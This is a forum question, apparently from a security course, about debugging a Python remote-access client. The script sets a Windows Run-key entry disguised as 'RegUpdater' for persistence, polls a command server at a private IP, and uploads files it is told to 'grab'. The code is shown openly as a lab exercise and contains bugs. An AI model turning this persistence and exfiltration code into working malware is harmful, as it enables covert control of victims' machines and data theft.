# Why script fails to create registry key?

Tags: python, windows

I'm working through this course Python for security
and I'm studying this script:

```
import requests, os, time, shutil, winreg
from subprocess import PIPE, check_output


path = os.getcwd().strip('/n')
Null, userprof = check_output('set USERPROFILE', shell=True, stdin=PIPE, stderr=PIPE).decode().split('=')
dest = userprof.strip('\n\r')+'\\Documents\\'+'client.exe'

if not os.path.exists(dest):
    shutil.copyfile(path+'\client.exe', dest)
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', winreg.SetValueEx(key, 'RegUpdater',
    0, winreg.REG_SZ, dest))
    winreg.SetValueEx(key, 'RegUpdater', 0, winreg.REG_SZ, dest)
    key.Close()

while True:
    req = requests.get('http://192.168.88.130:8080')
    command = req.text
    if 'terminate' in command:
        break
    elif 'grab' in command:
        grab, path = command.split('*')
        if os.path.exists(path):
            url = 'http://192.168.88.130:8080/store'
            files = {'file': open(path, 'rb')}
```

This script checks for presence of the `client.exe` file and if it doesn't find it it copies it from another directory, creates a key in windows registry and then establishes connection with a remote server.

I'm using `pyinstaller` in this exercise. So double click on `client.exe` kicks it off. Problem is I'm getting error saying "Script failed". I suspect it fails to create the registry key because after running it there's no key created.

How can I troubleshoot this ?

Comment: Does it work if you run as admin?

Comment: @RandomDavis Running it as root doesn't help although it was a valid question. Makes sense having to be a root since I'm messing around with registry keys.

Comment: @RandomDavis Running the script as a python file throws error about non existing file which is expected. The `client.exe` file supposed to be created in the `if not` block.